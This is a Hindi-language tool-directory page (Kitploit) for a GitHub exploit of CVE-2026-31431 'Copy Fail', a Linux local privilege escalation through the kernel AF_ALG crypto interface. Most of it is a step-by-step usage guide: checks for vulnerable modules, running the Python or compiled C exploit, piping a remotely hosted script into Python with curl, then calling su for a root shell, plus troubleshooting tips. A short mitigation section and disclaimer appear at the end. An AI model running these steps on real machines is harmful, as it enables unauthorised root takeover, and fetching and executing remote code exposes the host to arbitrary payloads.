Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Copy-Fail-Exploit-CVE-2026-31431 — अधिकांश Linux LPE को रेस विंडो या कर्नेल-विशिष्ट ऑफसेट की आवश्यकता होती है। Copy Fail एक सीधी-रेखा तर्क दोष है, इसे इनमें से किसी की भी आवश्यकता नहीं होती। वही 732-बाइट Python स्क्रिप्ट (या .c elf) 2017 के बाद से जारी हर Linux डिस्ट्रीब्यूशन को रूट कर देती है। | Kitploit
उपकरण/GitHubGitHub/painoob/copy-fail-exploit-cve-2026-31431
विशेषाधिकार वृद्धिशोषण फ्रेमवर्कभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगबाइनरी शोषण
GitHubpainoob/copy-fail-exploit-cve-2026-31431

Copy-Fail-Exploit-CVE-2026-31431

अधिकांश Linux LPE को रेस विंडो या कर्नेल-विशिष्ट ऑफसेट की आवश्यकता होती है। Copy Fail एक सीधी-रेखा तर्क दोष है, इसे इनमें से किसी की भी आवश्यकता नहीं होती। वही 732-बाइट Python स्क्रिप्ट (या .c elf) 2017 के बाद से जारी हर Linux डिस्ट्रीब्यूशन को रूट कर देती है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
104223 महीने पहलेKitploit द्वारा समीक्षित

कॉपी फेल (CVE-2026-31431) – एक्सप्लॉइट उपयोग गाइड

⚠️ अस्वीकरण

यह सामग्री केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। बिना स्पष्ट अनुमति के इसे किसी सिस्टम पर न चलाएं।


📌 अवलोकन

कॉपी फेल (CVE-2026-31431) एक Linux लोकल प्रिविलेज एस्केलेशन (LPE) भेद्यता है जो AF_ALG के माध्यम से कर्नेल क्रिप्टो API को प्रभावित करती है।

यह एक अनप्रिविलेज्ड उपयोगकर्ता को SUID बाइनरी (जैसे, /usr/bin/su) के पेज कैश डेटा को ओवरराइट करने और रूट एक्सेस प्राप्त करने की अनुमति देती है।


🧠 आवश्यकताएँ

सिस्टम आवश्यकताएँ

  • Linux कर्नेल (भेद्य – पैच स्थिति पर निर्भर करता है)
  • AF_ALG सक्षम
  • algif_aead मॉड्यूल लोडेड

Python एक्सप्लॉइट आवश्यकताएँ

  • Python 3.10+
  • समर्थन:
    • os.splice
    • socket(AF_ALG)

🔍 भेद्यता की जाँच

root@kitploit:~
uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg

अपेक्षित संकेतक:

  • authencesn(hmac(sha256),cbc(aes))
  • algif_aead लोडेड

🐍 Python एक्सप्लॉइट चलाना

1. सीधे निष्पादित करें

root@kitploit:~
python3 copy_fail_exp.py

2. या curl के माध्यम से (यदि रिमोट होस्टेड है)

root@kitploit:~
curl https://copy.fail/exp | python3

3. रूट शेल ट्रिगर करें

root@kitploit:~
su
id

अपेक्षित परिणाम:

root@kitploit:~
uid=0(root)

⚠️ सामान्य समस्याएँ (Python)

❌ त्रुटि: os.splice not found

कारण:

  • Python संस्करण < 3.10
  • प्रतिबंधित बिल्ड

समाधान:

  • नया Python बाइनरी उपयोग करें
  • स्टैटिक Python इंटरप्रेटर अपलोड करें

⚙️ C संस्करण संकलित करना

1. संकलित करें

root@kitploit:~
gcc copy_fail_exp.c -o copy_fail

2. निष्पादन योग्य बनाएं

root@kitploit:~
chmod +x copy_fail

3. एक्सप्लॉइट चलाएं

root@kitploit:~
./copy_fail
su

⚠️ सामान्य समस्याएँ (C)

❌ एक्सप्लॉइट चलता है लेकिन रूट नहीं मिलता

संभावित कारण:

  • कर्नेल पैच किया गया
  • गलत ऑफसेट
  • पर्यावरण बेमेल

❌ संकलन त्रुटियाँ

आवश्यक टूल इंस्टॉल करें:

root@kitploit:~
apt update && apt install build-essential

🧪 समस्या निवारण

जाँचें कि सिस्टम पैच किया गया है

root@kitploit:~
dmesg | grep -i alg

मॉड्यूल सत्यापित करें

root@kitploit:~
lsmod | grep algif_aead

🛡️ शमन

भेद्य मॉड्यूल अक्षम करें

root@kitploit:~
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead

कर्नेल पैच लागू करें

अपने सिस्टम को अपडेट करें:

root@kitploit:~
apt update && apt upgrade

📌 नोट्स

  • एक्सप्लॉइट केवल पेज कैश संशोधित करता है (गैर-स्थायी)
  • स्थानीय एक्सेस की आवश्यकता होती है
  • डिफ़ॉल्ट रूप से रिमोट से शोषण योग्य नहीं

🧠 अंतिम अंतर्दृष्टि

यदि एक्सप्लॉइट विफल हो जाता है, तो विचार करें:

  • कर्नेल पहले से पैच किया गया
  • पर्यावरण प्रतिबंध
  • वैकल्पिक प्रिविलेज एस्केलेशन वेक्टर (SUID, कैपेबिलिटीज़, sudo मिसकॉन्फ़िगरेशन)

📚 संदर्भ

  • https://copy.fail/
  • CVE-2026-31431

👨‍💻 लेखक नोट्स

इस एक्सप्लॉइट का उपयोग केवल लैब्स, CTFs और अधिकृत पेंटेस्ट में जिम्मेदारी से करें।

टूल डाउनलोड करें